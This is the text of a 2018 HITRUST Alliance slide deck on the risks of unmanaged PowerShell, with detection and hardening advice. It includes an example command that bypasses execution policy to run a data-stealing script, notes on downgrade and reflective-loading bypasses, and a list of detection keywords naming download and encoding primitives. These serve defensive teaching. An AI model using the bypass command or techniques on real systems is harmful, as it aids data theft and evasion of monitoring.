The Risks Associated with (unmanaged) PowerShell Casting a hidden .NET 1 © 2018 HITRUST Alliance PowerShell as an Attack Platform • Availability: – Built-in command shell in every Windows 7/2008 R2 and newer system • Detection: – Not commonly blocked or effectively blocked – PowerShell logging not commonly enabled/monitored • Capable: – Run Code in Memory == No on disk evidence – Download and execute code from the internet/another system – Many powerful capabilities 2 © 2018 HITRUST Alliance Living off the Land with Powershell • 38% of attacks involve PowerShell*….Why do attackers live off the land? – Reduces detection surface by using built-ins – Utilizes common, legitimate actions such as using cmd.exe – No AV or malware signatures; can bypass execution policy – Looks similar to normal activity, doesn’t stand out (as much) PowerShell.exe /ExecutionPolicy bypass /file stealdata.ps1 * https://www.carbonblack.com/wp-content/uploads/2016/04/Cb-Powershell-Deep-Dive-A-United-Threat-Research-Report-1.pdf 3 © 2018 HITRUST Alliance You’ve upgraded to PS v5 – Great! • Allows new controls: – Limit PS command usage (Constrained Language Model) – View obfuscated code (script block logging) – Monitor all PS execution (system-wide transcription) • Did you Uninstall PS v2? – If not, attackers can bypass v5 defensive capabilities by “downgrading” and running under v2 4 © 2018 HITRUST Alliance But You’re blocking PowerShell.exe?... • Blocking PowerShell.exe from running isn’t enough – PS can be invoked without access to the executable (System.Management.Automation.dll) • Attackers can provide their own “custom” PowerShell executable and run the code of their choosing (Unmanaged PowerShell) 5 © 2018 HITRUST Alliance What if You’re NOT blocking PowerShell.exe? • There are bountiful detection opportunities!! • Windows Host-based logging: – Command line logging* (but blind to script and interactive sessions) – PowerShell Event Logs needed to be enabled (version 3.0+) – Module logging… good luck! Event Codes 4103 and 4104 (4105/4106) – Transcription logging – full log of commands and output (version 5.0) • Sysmon – Event ID 7: PowerShell that’s not PowerShell (DLL loading of PS) • Windows Event Security Logs – Event ID 4688*: Awesome detections, but need to enable command line process auditing* (which you should be doing anyway) * Link in Appendix 6 © 2018 HITRUST Alliance Strong Indicators of Malicious PowerShell Use • Loading PowerShell via DLL – Sysmon Event ID 7 – Indicator values: • Task Category = Image Loaded • Image = “ *System.Management.Automation.ni.dll ” • There are some filtering options in Sysmon that will help this* – Other Methods: best way is to experiment • A word on Sysmon and general scripting attacks like PowerShell…. * link in Appendix 7 © 2018 HITRUST Alliance Strong Indicators of Malicious PowerShell Use • Windows Event Security Logs and Windows Command Line Auditing* – Event ID 4688 (Process Created) – Things to look for: “-ExecutionPolicy”, “bypass”, “-enc”, “Invoke-Expression” / “iex”, “Net.WebClient” – See https://www.crowdstrike.com/blog/investigating-powershell-command-and-script-logging/ for a good example of what encoding looks like – Other Methods: best way is to experiment • Machine Learning – Can use some basic clustering to understand better what is normal in your environment – anomalies/outliers are easy to spot – Some questions to ask are: • Who normally runs PowerShell? • What are normal and frequent commands? • Look at the length of commands * link on how to enable is in Appendix 8 © 2018 HITRUST Alliance So, You have EDR and Device Guard?... • Watch your logs, watch your logs, watch your logs… • Attackers can bypass EDR and Device Guard by running their code “reflectively” – Load and execute malicious code (.NET “assemblies”) at run time using trusted executables – Code can be run in memory, thwarting some EDR solutions and leaving next to no host based evidence. 9 © 2018 HITRUST Alliance PS requires a Safety • PowerShell is a powerful tool for managing your Windows Environment, but: – Enable enhanced logging and auditing to help your cyber security defenders. – Utilize “Just Enough Administration” (JEA) configuration capabilities to dial in and limit PowerShell usage • PowerShell is also a powerful attack tool, reduce risk by: – Enable and MONITOR logs, enable JEA, upgrade and remove old versions… 10 © 2018 HITRUST Alliance Closing Thought: Powershell has lots of detection opportunities to explore….but start with the #1 Incident Response Tool: The Google 11 © 2018 HITRUST Alliance Visit www.HITRUSTAlliance.net for more information To view our latest documents, visit the Content Spotlight 12 © 2018 HITRUST Alliance Appendix Resources Configuring Command Line Process Auditing: https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/component-updates/command-line-process-auditing Sysmon Filter: https://github.com/datasci4security/sysmon-config General PowerShell Detections: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ https://www.blackhillsinfosec.com/powershell-w-o-powershell-simplified/ https://arxiv.org/pdf/1804.04177.pdf (an article on using deep learning for PowerShell detections; if you know basic python you can do this easily in Keras) https://www.carbonblack.com/wp-content/uploads/2016/04/Cb-Powershell-Deep-Dive-A-United-Threat-Research-Report-1.pdf 13 © 2018 HITRUST Alliance .